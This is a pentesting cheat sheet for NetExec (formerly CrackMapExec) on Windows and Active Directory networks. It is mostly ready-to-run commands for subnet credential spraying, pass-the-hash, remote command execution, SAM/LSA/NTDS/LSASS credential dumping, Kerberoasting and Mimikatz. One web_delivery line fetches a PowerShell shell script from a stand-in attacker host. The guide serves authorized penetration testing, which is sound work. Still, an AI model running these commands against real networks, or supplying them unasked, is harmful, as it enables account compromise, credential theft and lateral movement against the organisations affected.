CrackMapExec (CME), now continued as NetExec, is an indispensable post-exploitation tool for network pentesting, particularly in Windows and Active Directory environments. It automates credential testing across entire subnets, executes commands, dumps credentials, and enumerates AD information — all from the command line.
Installation
The project is now maintained as NetExec (nxc):
# Install NetExec (successor to CME)
pip3 install netexec
# Or from package managers
sudo apt install crackmapexec # Kali (older CME version)
# From source (latest)
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec && pip3 install .
Both cme and nxc work the same way. This guide uses nxc.
Supported Protocols
NetExec supports: smb, winrm, mssql, ldap, rdp, ssh, ftp, vnc
nxc smb --help
nxc winrm --help
SMB Enumeration
Basic host discovery and SMB info
# Single host
nxc smb 192.168.1.10
# Subnet scan
nxc smb 192.168.1.0/24
# From host file
nxc smb hosts.txt
Output shows hostname, OS version, signing status, and domain name — all without credentials.
Check SMB signing
Hosts without SMB signing are vulnerable to relay attacks:
nxc smb 192.168.1.0/24 --gen-relay-list relay_targets.txt
List shares
nxc smb 192.168.1.10 -u user -p password --shares
Spider shares for interesting files
nxc smb 192.168.1.10 -u user -p password -M spider_plus
This module lists all readable files across all shares — great for finding credentials, config files, and sensitive documents.
Credential Testing and Spraying
Test a single credential
nxc smb 192.168.1.10 -u administrator -p 'Password123!'
# Pwned! = local admin
# + = valid but not admin
Credential spraying across a subnet
nxc smb 192.168.1.0/24 -u userlist.txt -p 'Winter2024!' --continue-on-success
Critical: add --no-bruteforce when testing multiple users against multiple passwords to avoid account lockout. Test one password at a time:
nxc smb 192.168.1.0/24 -u userlist.txt -p passwordlist.txt --no-bruteforce
Pass-the-Hash
nxc smb 192.168.1.0/24 -u administrator -H 'NTLMhash'
Pass-the-Ticket (Kerberos)
export KRB5CCNAME=/tmp/admin.ccache
nxc smb dc.domain.local -u admin -k --use-kcache
Command Execution
Once you have credentials with admin rights:
# Run a command
nxc smb 192.168.1.10 -u admin -p password -x "whoami"
# PowerShell command
nxc smb 192.168.1.10 -u admin -p password -X "Get-Process | Select Name"
# Execution method (default: wmiexec, alternatives: atexec, mmcexec)
nxc smb 192.168.1.10 -u admin -p password -x "whoami" --exec-method smbexec
Credential Dumping
SAM dump (local accounts)
nxc smb 192.168.1.10 -u admin -p password --sam
LSA secrets
nxc smb 192.168.1.10 -u admin -p password --lsa
NTDS.dit (domain controller)
nxc smb dc.domain.local -u domain_admin -p password --ntds
LSASS dump (requires local admin)
nxc smb 192.168.1.10 -u admin -p password -M lsassy
Lsassy module dumps LSASS memory and parses credentials automatically.
WinRM
# Test credentials
nxc winrm 192.168.1.10 -u user -p password
# Execute command
nxc winrm 192.168.1.10 -u user -p password -x "whoami"
LDAP and Active Directory Enumeration
# Domain info
nxc ldap dc.domain.local -u user -p password
# Get all users
nxc ldap dc.domain.local -u user -p password --users
# Get all groups
nxc ldap dc.domain.local -u user -p password --groups
# Find Kerberoastable accounts
nxc ldap dc.domain.local -u user -p password --kerberoasting output.txt
# Find ASREPRoastable accounts
nxc ldap dc.domain.local -u user -p password --asreproast output.txt
# Find users with unconstrained delegation
nxc ldap dc.domain.local -u user -p password --trusted-for-delegation
MSSQL
# Authenticate
nxc mssql 192.168.1.10 -u sa -p password
# Execute OS commands via xp_cmdshell
nxc mssql 192.168.1.10 -u sa -p password -x "whoami"
Modules
NetExec has an extensible module system:
# List all modules for SMB
nxc smb -L
# Useful modules
nxc smb target -u user -p pass -M mimikatz # Run Mimikatz
nxc smb target -u user -p pass -M gpp_password # Find GPP passwords
nxc smb target -u user -p pass -M rdp --options "ACTION=enable" # Enable RDP
nxc smb target -u user -p pass -M web_delivery --options "URL=http://attacker/shell.ps1"
Database and Output
NetExec stores all results in a local database (~/.nxc/nxc.db):
# View stored credentials
nxcdb
# Inside nxcdb
creds # show all credentials
hosts # show all hosts
NetExec is one of the fastest ways to map a Windows network, validate credential sets, and escalate access in an AD environment. Always use it within the scope of authorized testing only.